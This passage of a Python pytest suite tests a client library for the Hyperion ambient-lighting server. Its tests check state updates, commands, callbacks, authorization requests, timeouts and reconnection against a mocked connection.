# === Verify flipping a component.
components_update = {
"command": "components-update",
"data": {"enabled": False, "name": "SMOOTHING"},
}
assert hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
assert not hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
    # === Verify a component change where the component name does not exist.
component_name = "NOT_EXISTING"
components_update = {
"command": "components-update",
"data": {"enabled": True, "name": component_name},
}
assert not hc.is_on(components=[component_name])
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
assert hc.is_on(components=[component_name])
@pytest.mark.asyncio
async def test_update_adjustment(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating adjustments."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
adjustment_update = {
"command": "adjustment-update",
"data": [{"brightness": 25}],
}
assert hc.adjustment
assert hc.adjustment[0]["brightness"] == 83
await rw.add_flow([("read", adjustment_update)])
await _block_until_done(rw)
assert hc.adjustment[0]["brightness"] == 25
@pytest.mark.asyncio
async def test_update_effect_list(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating effect list."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
effect = {
"args": {
"hueChange": 60,
"reverse": False,
"rotationTime": 60,
"smoothing-custom-settings": None,
},
"file": ":/effects//mood-blobs-blue.json",
"name": "Blue mood blobs",
"script": ":/effects//mood-blobs.py",
}
effects_update = {
"command": "effects-update",
"data": [effect],
}
await rw.add_flow([("read", effects_update)])
await _block_until_done(rw)
assert hc.effects
assert len(hc.effects) == 1
assert hc.effects[0] == effect
@pytest.mark.asyncio
async def test_update_priorities(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating priorities."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
priorities = [
{
"active": True,
"componentId": "GRABBER",
"origin": "System",
"owner": "X11",
"priority": 250,
"visible": True,
},
{
"active": True,
"componentId": "EFFECT",
"origin": "System",
"owner": "Warm mood blobs",
"priority": 254,
"visible": False,
},
{
"active": True,
"componentId": "COLOR",
"origin": "System",
"owner": "System",
"priority": 40,
"value": {"HSL": [65535, 0, 0], "RGB": [0, 0, 0]},
"visible": False,
},
]
priorities_update = {
"command": "priorities-update",
"data": {"priorities": priorities, "priorities_autoselect": False},
}
assert hc.priorities
assert len(hc.priorities) == 2
assert hc.priorities_autoselect
assert hc.visible_priority
assert hc.visible_priority["priority"] == 240
await rw.add_flow([("read", priorities_update)])
await _block_until_done(rw)
assert hc.priorities == priorities
assert hc.visible_priority == priorities[0]
assert not hc.priorities_autoselect
priorities_update = {
"command": "priorities-update",
"data": {"priorities": [], "priorities_autoselect": True},
}
await rw.add_flow([("read", priorities_update)])
await _block_until_done(rw)
    assert hc.priorities_autoselect
assert hc.visible_priority is None
@pytest.mark.asyncio
async def test_update_instances(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test updating instances."""
hc = await _create_client_and_connect(rw)
assert hc.instances
assert len(hc.instances) == 2
assert hc.instance == 0
assert hc.target_instance == 0
instances = [
{"instance": 0, "running": True, "friendly_name": "Test instance 0"},
{"instance": 1, "running": True, "friendly_name": "Test instance 1"},
{"instance": 2, "running": True, "friendly_name": "Test instance 2"},
]
instances_update = {
"command": "instance-update",
"data": instances,
}
await rw.add_flow([("read", instances_update)])
await _block_until_done(rw)
assert hc.instances == instances
    # Now update instances again, this time with instance 0 (the current one)
    # no longer running.
instances = [
{"instance": 0, "running": False, "friendly_name": "Test instance 0"},
{"instance": 1, "running": True, "friendly_name": "Test instance 1"},
{"instance": 2, "running": True, "friendly_name": "Test instance 2"},
]
instances_update = {
"command": "instance-update",
"data": instances,
}
await rw.add_flow(
[
("read", instances_update),
("close", None),
]
)
# Because the target instance is no longer running, the client should disconnect
# automatically.
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
assert hc.target_instance == 0
assert hc.instance is None
@pytest.mark.asyncio
async def test_update_led_mapping_type(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating LED mapping type."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
led_mapping_type = "unicolor_mean"
led_mapping_type_update = {
"command": "imageToLedMapping-update",
"data": {"imageToLedMappingType": led_mapping_type},
}
assert hc.led_mapping_type != led_mapping_type
await rw.add_flow([("read", led_mapping_type_update)])
await _block_until_done(rw)
assert hc.led_mapping_type == led_mapping_type
@pytest.mark.asyncio
async def test_update_sessions(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating sessions."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sessions = [
{
"address": "192.168.58.169",
"domain": "local.",
"host": "ubuntu-2",
"name": "My Hyperion Config@ubuntu:8090",
"port": 8090,
"type": "_hyperiond-http._tcp.",
}
]
sessions_update = {
"command": "sessions-update",
"data": sessions,
}
assert hc.sessions == []
await rw.add_flow([("read", sessions_update)])
await _block_until_done(rw)
assert hc.sessions == sessions
@pytest.mark.asyncio
async def test_videomode(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
videomode = "3DSBS"
videomode_update = {
"command": "videomode-update",
"data": {"videomode": videomode},
}
assert hc.videomode == "2D"
await rw.add_flow([("read", videomode_update)])
await _block_until_done(rw)
assert hc.videomode == videomode
@pytest.mark.asyncio
async def test_update_leds(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating LEDs."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
leds = [{"hmin": 0.0, "hmax": 1.0, "vmin": 0.0, "vmax": 1.0}]
leds_update = {"command": "leds-update", "data": {"leds": leds}}
assert hc.leds
assert len(hc.leds) == 254
await rw.add_flow([("read", leds_update)])
await _block_until_done(rw)
assert hc.leds == leds
@pytest.mark.asyncio
async def test_async_send_set_color(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling color."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
color_in = {
"color": [0, 0, 255],
"command": "color",
"origin": "My Fancy App",
"priority": 50,
}
await rw.add_flow([("write", color_in)])
assert await hc.async_send_set_color(**color_in)
await _block_until_done(rw)
color_in = {
"color": [0, 0, 255],
"priority": 50,
}
color_out = {
"command": "color",
"color": [0, 0, 255],
"priority": 50,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", color_out)])
assert await hc.async_send_set_color(**color_in)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_async_send_set_effect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling effect."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
effect_in = {
"command": "effect",
"effect": {"name": "Warm mood blobs"},
"priority": 50,
"origin": "My Fancy App",
}
await rw.add_flow([("write", effect_in)])
assert await hc.async_send_set_effect(**effect_in)
effect_in = {
"effect": {"name": "Warm mood blobs"},
"priority": 50,
}
effect_out = {
"command": "effect",
"effect": {"name": "Warm mood blobs"},
"priority": 50,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", effect_out)])
assert await hc.async_send_set_effect(**effect_in)
@pytest.mark.asyncio
async def test_async_send_set_image(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test controlling image."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
image_in = {
"command": "image",
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
"origin": "My Fancy App",
}
await rw.add_flow([("write", image_in)])
assert await hc.async_send_set_image(**image_in)
image_in = {
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
}
image_out = {
"command": "image",
"imagedata": "VGhpcyBpcyBubyBpbWFnZSEgOik=",
"name": "Name of Image",
"format": "auto",
"priority": 50,
"duration": 5000,
"origin": const.DEFAULT_ORIGIN,
}
await rw.add_flow([("write", image_out)])
assert await hc.async_send_set_image(**image_in)
@pytest.mark.asyncio
async def test_async_send_clear(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test clearing priorities."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {
"command": "clear",
"priority": 50,
}
await rw.add_flow([("write", clear_in)])
assert await hc.async_send_clear(**clear_in)
await rw.add_flow([("write", clear_in)])
assert await hc.async_send_clear(priority=50)
@pytest.mark.asyncio
async def test_async_send_set_adjustment(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting adjustment."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
adjustment_in = {"command": "adjustment", "adjustment": {"gammaRed": 1.5}}
await rw.add_flow([("write", adjustment_in)])
assert await hc.async_send_set_adjustment(**adjustment_in)
await rw.add_flow([("write", adjustment_in)])
assert await hc.async_send_set_adjustment(adjustment={"gammaRed": 1.5})
@pytest.mark.asyncio
async def test_async_send_set_led_mapping_type(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test setting adjustment."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
led_mapping_type_in = {
"command": "processing",
"mappingType": "multicolor_mean",
}
await rw.add_flow([("write", led_mapping_type_in)])
assert await hc.async_send_set_led_mapping_type(**led_mapping_type_in)
await rw.add_flow([("write", led_mapping_type_in)])
assert await hc.async_send_set_led_mapping_type(mappingType="multicolor_mean")
@pytest.mark.asyncio
async def test_async_send_set_videomode(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
videomode_in = {"command": "videomode", "videoMode": "3DTAB"}
await rw.add_flow([("write", videomode_in)])
assert await hc.async_send_set_videomode(**videomode_in)
await rw.add_flow([("write", videomode_in)])
assert await hc.async_send_set_videomode(videoMode="3DTAB")
@pytest.mark.asyncio
async def test_async_send_set_component(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting component."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
componentstate = {
"component": "LEDDEVICE",
"state": False,
}
component_in = {
"command": "componentstate",
"componentstate": componentstate,
}
await rw.add_flow([("write", component_in)])
assert await hc.async_send_set_component(**component_in)
await rw.add_flow([("write", component_in)])
assert await hc.async_send_set_component(componentstate=componentstate)
@pytest.mark.asyncio
async def test_async_send_set_sourceselect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting sourceselect."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sourceselect_in = {"command": "sourceselect", "priority": 50}
await rw.add_flow([("write", sourceselect_in)])
assert await hc.async_send_set_sourceselect(**sourceselect_in)
await rw.add_flow([("write", sourceselect_in)])
assert await hc.async_send_set_sourceselect(priority=50)
@pytest.mark.asyncio
async def test_start_async_send_stop_switch_instance(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting, stopping and switching instances."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "instance", "subcommand": "startInstance", "instance": 1}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_start_instance(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_start_instance(instance=1)
stop_in = {"command": "instance", "subcommand": "stopInstance", "instance": 1}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_stop_instance(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_stop_instance(instance=1)
switch_in = {"command": "instance", "subcommand": "switchTo", "instance": 1}
await rw.add_flow([("write", switch_in)])
assert await hc.async_send_switch_instance(**switch_in)
await rw.add_flow([("write", switch_in)])
assert await hc.async_send_switch_instance(instance=1)
@pytest.mark.asyncio
async def test_start_async_send_stop_image_stream(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting and stopping an image stream."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "ledcolors", "subcommand": "imagestream-start"}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_image_stream_start(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_image_stream_start()
stop_in = {"command": "ledcolors", "subcommand": "imagestream-stop"}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_image_stream_stop(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_image_stream_stop()
@pytest.mark.asyncio
async def test_async_send_start_stop_led_stream(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test starting and stopping an led stream."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
start_in = {"command": "ledcolors", "subcommand": "ledstream-start"}
await rw.add_flow([("write", start_in)])
assert await hc.async_send_led_stream_start(**start_in)
await rw.add_flow([("write", start_in)])
assert await hc.async_send_led_stream_start()
stop_in = {"command": "ledcolors", "subcommand": "ledstream-stop"}
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_led_stream_stop(**stop_in)
await rw.add_flow([("write", stop_in)])
assert await hc.async_send_led_stream_stop()
@pytest.mark.asyncio
# pylint: disable=too-many-statements
async def test_callbacks(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test updating components."""
cb = Mock()
hc = await _create_client_and_connect(
rw,
default_callback=cb.default_callback,
callbacks={
"components-update": cb.component_callback,
"serverinfo": cb.serverinfo_callback,
"client-update": cb.client_callback,
},
)
assert cb.client_callback.call_args_list == [
call(
{
"command": "client-update",
"connected": True,
"logged-in": False,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": False,
}
),
call(
{
"command": "client-update",
"connected": True,
"logged-in": True,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": False,
}
),
call(
{
"command": "client-update",
"connected": True,
"logged-in": True,
"instance": const.DEFAULT_INSTANCE,
"loaded-state": True,
}
),
]
assert cb.serverinfo_callback.call_args[0][0] == _read_file(
FILE_SERVERINFO_RESPONSE
)
cb.reset_mock()
# === Flip a component.
components_update = {
"command": "components-update",
"data": {"enabled": False, "name": "SMOOTHING"},
}
# Make sure the callback was called.
await rw.add_flow([("read", components_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.component_callback.assert_called_once_with(components_update)
cb.reset_mock()
# Call with a new update that does not have a registered callback.
random_update_value = "random-update"
random_update = {
"command": random_update_value,
}
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now set a callback for that update.
hc.set_callbacks({random_update_value: cb.first_callback})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now add a second callback for that update.
hc.add_callbacks({random_update_value: cb.second_callback})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Now add multiple callbacks.
hc.add_callbacks({random_update_value: [cb.third_callback, cb.fourth_callback]})
hc.add_callbacks({})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.third_callback.assert_called_once_with(random_update)
cb.fourth_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Set multiple callbacks (effectively removing a few).
hc.set_callbacks({random_update_value: [cb.third_callback, cb.fourth_callback]})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_not_called()
cb.second_callback.assert_not_called()
cb.third_callback.assert_called_once_with(random_update)
cb.fourth_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Remove some callbacks.
hc.add_callbacks({random_update_value: [cb.first_callback, cb.second_callback]})
hc.remove_callbacks({random_update_value: cb.third_callback})
hc.remove_callbacks({random_update_value: [cb.fourth_callback]})
hc.remove_callbacks({})
hc.remove_callbacks({"not-here": cb.null_callback})
hc.remove_callbacks({random_update_value: []})
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_called_once_with(random_update)
cb.second_callback.assert_called_once_with(random_update)
cb.third_callback.assert_not_called()
cb.fourth_callback.assert_not_called()
cb.null_callback.assert_not_called()
cb.reset_mock()
# Remove all callbacks.
hc.set_callbacks(None)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.first_callback.assert_not_called()
cb.second_callback.assert_not_called()
cb.reset_mock()
# Add another default callback.
hc.add_default_callback(cb.second_default_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_called_once_with(random_update)
cb.second_default_callback.assert_called_once_with(random_update)
cb.reset_mock()
# Remove a default callback.
hc.remove_default_callback(cb.default_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.second_default_callback.assert_called_once_with(random_update)
cb.reset_mock()
awaitable_json = None
async def awaitable_callback(arg: dict[str, Any]) -> None:
nonlocal awaitable_json
awaitable_json = arg
# Set an async default callback.
hc.set_default_callback(awaitable_callback)
await rw.add_flow([("read", random_update)])
await _block_until_done(rw)
cb.default_callback.assert_not_called()
cb.second_default_callback.assert_not_called()
assert awaitable_json == random_update
# Verify disconnection callback.
hc.set_callbacks({"client-update": cb.client_callback})
await _disconnect_and_assert_finished(rw, hc)
cb.client_callback.assert_called_once_with(
{
"command": "client-update",
"connected": False,
"instance": None,
"loaded-state": False,
"logged-in": False,
},
)
@pytest.mark.asyncio
async def test_is_auth_required(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test determining if authorization is required."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
auth_request = {"command": "authorize", "subcommand": "tokenRequired", "tan": 2}
auth_response = {
"command": "authorize-tokenRequired",
"info": {"required": True},
"success": True,
"tan": 2,
}
await rw.add_flow([("write", auth_request), ("read", auth_response)])
received = await hc.async_is_auth_required()
await _block_until_done(rw)
assert received == auth_response
@pytest.mark.asyncio
async def test_async_send_login(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test setting videomode."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
token = "<PASSWORD>"
auth_login_in = {
"command": "authorize",
"subcommand": "login",
"token": token,
}
await rw.add_flow([("write", auth_login_in)])
assert await hc.async_send_login(**auth_login_in)
await rw.add_flow([("write", auth_login_in)])
assert await hc.async_send_login(token=token)
@pytest.mark.asyncio
async def test_disconnecting_leaves_no_tasks(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Verify stopping the background task."""
before_tasks = asyncio.all_tasks()
hc = await _create_client_and_connect(rw)
await _disconnect_and_assert_finished(rw, hc)
assert before_tasks == asyncio.all_tasks()
@pytest.mark.asyncio
async def test_async_send_logout(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test setting videomode."""
before_tasks = asyncio.all_tasks()
hc = await _create_client_and_connect(rw)
auth_logout_in = {
"command": "authorize",
"subcommand": "logout",
}
await rw.add_flow([("write", auth_logout_in)])
assert await hc.async_send_logout(**auth_logout_in)
await rw.add_flow([("write", auth_logout_in)])
assert await hc.async_send_logout()
# A logout success response should cause the client to disconnect.
auth_logout_out = {
"command": "authorize-logout",
"success": True,
}
await rw.add_flow([("read", auth_logout_out), ("close", None)])
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
# Verify there are no tasks left running (logout is interesting
# in that the disconnection is from the receive task, so cancellation
# of the receive task could cut the disconnection process off).
assert before_tasks == asyncio.all_tasks()
@pytest.mark.asyncio
async def test_async_send_request_token(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test requesting an auth token."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# Test requesting a token.
request_token_in: dict[str, Any] = {
"command": "authorize",
"subcommand": "requestToken",
"comment": "Test",
"id": "T3c92",
}
await rw.add_flow([("write", request_token_in)])
assert await hc.async_send_request_token(**request_token_in)
# Test requesting a token with minimal provided parameters, will cause
# the ID to be automatically generated.
small_request_token_in = {
"comment": "Test",
}
# Ensure an ID gets generated.
await rw.add_flow(
[
(
"write",
lambda x: (
len(x.get("id")) == 5
and [x.get(key) for key in ["command", "subcommand", "comment"]]
== [
request_token_in.get(key)
for key in ["command", "subcommand", "comment"]
]
),
)
]
)
assert await hc.async_send_request_token(**small_request_token_in)
# Abort a request for a token.
request_token_in["accept"] = False
await rw.add_flow([("write", request_token_in)])
assert await hc.async_send_request_token_abort(**request_token_in)
@pytest.mark.asyncio
async def test_async_send_serverinfo(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test requesting serverinfo."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
await rw.add_flow([("write", SERVERINFO_REQUEST)])
assert await hc.async_send_get_serverinfo(**SERVERINFO_REQUEST)
def test_threaded_client() -> None:
"""Test the threaded client."""
hc = client.ThreadedHyperionClient(
TEST_HOST,
TEST_PORT,
)
# Start the loop in the other thread.
hc.start()
hc.wait_for_client_init()
# Note: MockStreamReaderWriter is not thread safe, so only a very limited test
# is performed here.
with patch("asyncio.open_connection", side_effect=ConnectionError):
assert not hc.client_connect()
assert not hc.is_connected
hc.stop()
hc.join()
def test_threaded_client_has_correct_methods() -> None:
"""Verify the threaded client exports all the correct methods."""
contents = dir(
client.ThreadedHyperionClient(
TEST_HOST,
TEST_PORT,
)
)
# Verify all async methods have a sync wrapped version.
for name, _ in inspect.getmembers(
client.ThreadedHyperionClient, inspect.iscoroutinefunction
):
if name.startswith("async_"):
assert name[len("async_") :] in contents
for name, _ in inspect.getmembers(
client.ThreadedHyperionClient, lambda o: isinstance(o, property)
):
assert name in contents
@pytest.mark.asyncio
async def test_client_write_and_close_handles_network_issues(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> None:
"""Verify sending data does not throw exceptions."""
hc = await _create_client_and_connect(rw)
# Verify none of these write operations result in an exception
# propagating to the test.
await rw.add_flow([("write", ConnectionError("Write exception"))])
assert not await hc.async_send_image_stream_start()
await rw.add_flow([("close", ConnectionError("Close exception"))])
assert not await hc.async_client_disconnect()
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_client_handles_network_issues_bad_read(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify a bad read causes a reconnection."""
rw = hyperion_fixture.rw
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("read", ConnectionError("Read exception")),
("close", None),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_handles_network_issues_unexpected_close(
event_loop: asyncio.AbstractEventLoop,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify an unexpected close causes a reconnection."""
# == Verify an empty read causes a disconnect and reconnect.
(rw, _) = hyperion_fixture.rw, hyperion_fixture.hc
# == Read returns empty, connection closed, but instantly re-established.
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("read", ""),
("close", None),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_handles_network_issues_bad_read_cannot_reconnect_ads(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify behavior after a bad read when the connection cannot be re-established."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# == Read throws an exception, connection closed, cannot be re-established.
with patch("asyncio.open_connection", side_effect=ConnectionError):
await rw.add_flow([("read", ConnectionError("Read error")), ("close", None)])
await rw.block_until_flow_empty()
# Wait f"{const.DEFAULT_CONNECTION_RETRY_DELAY_SECS}" seconds and then the
# connection should be re-established.
# Check at half that timeout that we're still not connected.
assert not hc.is_connected
await advance_time(const.DEFAULT_CONNECTION_RETRY_DELAY_SECS / 2)
assert not hc.is_connected
    # Fast-forward the remaining half of the delay (+1 second to be safely
    # past it), after which the client should reconnect automatically.
with patch("asyncio.open_connection", return_value=(rw, rw)):
await rw.add_flow(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
(
"read",
{**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}},
),
]
)
await advance_time((const.DEFAULT_CONNECTION_RETRY_DELAY_SECS / 2) + 1)
await _block_until_done(rw)
@pytest.mark.asyncio
async def test_client_connect_handles_network_issues_cannot_reconnect_connection_error(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> None:
"""Verify connecting does throw exceptions and behaves correctly."""
hc = await _create_client_and_connect(rw)
with patch(
"asyncio.open_connection",
side_effect=ConnectionError("Connection exception"),
):
await rw.add_flow([("read", ""), ("close", None)])
await rw.block_until_flow_empty()
assert not hc.is_connected
# Disconnect to avoid it attempting to reconnect.
assert await hc.async_client_disconnect()
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_client_connection_timeout(event_loop: asyncio.AbstractEventLoop) -> None:
"""Verify connection and read timeouts behave correctly."""
# == Verify timeout is dealt with correctly during connection.
with patch("asyncio.open_connection", side_effect=asyncio.TimeoutError):
hc = client.HyperionClient(TEST_HOST, TEST_PORT)
assert not await hc.async_client_connect()
@pytest.mark.asyncio
async def test_client_timeout(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Verify connection and read timeouts behave correctly."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
# == Verify timeout is dealt with during read.
await rw.add_flow([("write", {**SERVERINFO_REQUEST, **{"tan": 2}})])
# Create a new task to get the serverinfo ...
task = asyncio.create_task(hc.async_get_serverinfo())
# ... wait until the flow is empty (i.e. the request is written to the
# server).
await rw.block_until_flow_empty()
# Advance the clock so it times out waiting.
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
# Ensuring the task fails.
assert not await task
# == Verify custom timeouts function in calls.
await rw.add_flow([("write", {**SERVERINFO_REQUEST, **{"tan": 3}})])
    # Create a task that fetches serverinfo and will wait 3 times the default.
task = asyncio.create_task(
hc.async_get_serverinfo(timeout_secs=const.DEFAULT_TIMEOUT_SECS * 3)
)
# Wait 2 times the default (task should NOT have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not task.done()
# Wait a further two times (should have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not await task
assert task.done()
# == Verify request_token has a much larger default timeout.
auth_id = ("<PASSWORD>",)
comment = const.DEFAULT_ORIGIN
request_token_in = {
"command": "authorize",
"subcommand": "requestToken",
"comment": comment,
"id": auth_id,
}
await rw.add_flow([("write", {**request_token_in, **{"tan": 4}})])
# Create a task that requests a token (without overriding the default timeout).
task = asyncio.create_task(
hc.async_request_token(comment=const.DEFAULT_ORIGIN, id=auth_id)
)
# Wait 2 times the default timeout (task should NOT have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not task.done()
await advance_time(const.DEFAULT_REQUEST_TOKEN_TIMEOUT_SECS)
assert not await task
assert task.done()
@pytest.mark.asyncio
async def test_send_and_receive(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test a send and receive wrapper."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {"command": "clear", "priority": 50, "tan": 2}
clear_out = {"command": "clear", "success": True, "tan": 2}
# == Successful request & response.
await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50) == clear_out
# == Successful request & failed response.
clear_out["success"] = False
clear_out["tan"] = clear_in["tan"] = 3
await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50) == clear_out
# == Mismatch tan / timeout
# Test when the result doesn't include a matching tan (should time
# out). See related bug to include tan wherever possible:
#
# https://github.com/hyperion-project/hyperion.ng/issues/1001
clear_error = {
"command": "clear",
"error": "Errors during specific message validation, "
"please consult the Hyperion Log",
"success": False,
"tan": 0,
}
clear_in["tan"] = 4
await rw.add_flow([("write", clear_in), ("read", clear_error)])
task = asyncio.create_task(hc.async_clear(priority=50))
await rw.block_until_flow_empty()
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert await task is None
# == Exception thrown in send.
await rw.add_flow([("write", ConnectionError())])
result = await hc.async_clear(**clear_in)
assert result is None
@pytest.mark.asyncio
async def test_using_custom_tan(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test a send and receive wrapper."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {"command": "clear", "priority": 50, "tan": 100}
clear_out = {"command": "clear", "success": True, "tan": 100}
# Test a successful call with a custom tan.
